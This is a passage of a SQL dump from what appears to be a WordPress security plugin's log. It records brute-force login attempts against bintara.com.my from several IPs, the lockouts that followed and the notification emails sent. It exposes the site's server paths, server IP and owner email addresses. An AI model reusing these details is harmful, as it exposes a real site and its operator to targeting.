Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYpfTDrcQxTmGrCWuaS-AAAAdY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"54620\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYpfTDrcQxTmGrCWuaS-AAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073533.4135\";s:12:\"REQUEST_TIME\";s:10:\"1569073533\";}}','notice','2019-09-21 13:45:34','2019-09-21 13:45:33',17852792,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'103.90.224.155'),(26049,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYpfTDrcQxTmGrCWuaS-AAAAdY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"54620\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYpfTDrcQxTmGrCWuaS-AAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073533.4135\";s:12:\"REQUEST_TIME\";s:10:\"1569073533\";}}','notice','2019-09-21 13:45:35','2019-09-21 13:45:33',18019776,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'103.90.224.155'),(26050,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:45:33\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:45:33\";s:14:\"lockout_expire\";s:19:\"2019-09-26 01:45:33\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 17:45:33\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:45:35','2019-09-21 13:45:33',18054248,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'103.90.224.155'),(26051,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:45:35','2019-09-21 13:45:33',18261312,19338768,'https://bintara.com.my/2019/wp-login.php',1,0,'103.90.224.155'),(26052,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYp2FiJ7D9Gn7wDPh8i3gAAANA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"157.245.5.62\";s:11:\"REMOTE_PORT\";s:5:\"53576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYp2FiJ7D9Gn7wDPh8i3gAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073624.1364\";s:12:\"REQUEST_TIME\";s:10:\"1569073624\";}}','notice','2019-09-21 13:47:05','2019-09-21 13:47:04',17851480,19336672,'https://bintara.com.my/wp/wp-login.php',1,0,'157.245.5.62'),(26053,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYp2FiJ7D9Gn7wDPh8i3gAAANA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"157.245.5.62\";s:11:\"REMOTE_PORT\";s:5:\"53576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYp2FiJ7D9Gn7wDPh8i3gAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073624.1364\";s:12:\"REQUEST_TIME\";s:10:\"1569073624\";}}','notice','2019-09-21 13:47:06','2019-09-21 13:47:04',18018120,19336672,'https://bintara.com.my/wp/wp-login.php',1,0,'157.245.5.62'),(26054,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:47:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:47:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 01:47:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 17:47:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:47:06','2019-09-21 13:47:04',18052328,19336672,'https://bintara.com.my/wp/wp-login.php',1,0,'157.245.5.62'),(26055,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:47:06','2019-09-21 13:47:04',18258976,19336672,'https://bintara.com.my/wp/wp-login.php',1,0,'157.245.5.62'),(26056,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrS1iJ7D9Gn7wDPh8jzwAAANA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"89.145.74.91\";s:11:\"REMOTE_PORT\";s:5:\"52272\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrS1iJ7D9Gn7wDPh8jzwAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073995.9558\";s:12:\"REQUEST_TIME\";s:10:\"1569073995\";}}','notice','2019-09-21 13:53:17','2019-09-21 13:53:16',17848328,19340808,'https://bintara.com.my/2019/wp-login.php',1,0,'89.145.74.91'),(26057,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrTDDrcQxTmGrCWuaTagAAAcc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.211.2.59\";s:11:\"REMOTE_PORT\";s:5:\"44054\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrTDDrcQxTmGrCWuaTagAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569073997.0372\";s:12:\"REQUEST_TIME\";s:10:\"1569073997\";}}','notice','2019-09-21 13:53:18','2019-09-21 13:53:17',17849320,19339784,'https://bintara.com.my/blog/wp-login.php',1,0,'80.211.2.59'),(26058,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYrUHkXpgmG5P@iB8k3TAAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.211.2.59\";s:11:\"REMOTE_PORT\";s:5:\"46592\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYrUHkXpgmG5P@iB8k3TAAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074000.6792\";s:12:\"REQUEST_TIME\";s:10:\"1569074000\";}}','notice','2019-09-21 13:53:22','2019-09-21 13:53:21',18364336,19661744,'https://bintara.com.my/blog/xmlrpc.php',1,0,'80.211.2.59'),(26059,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 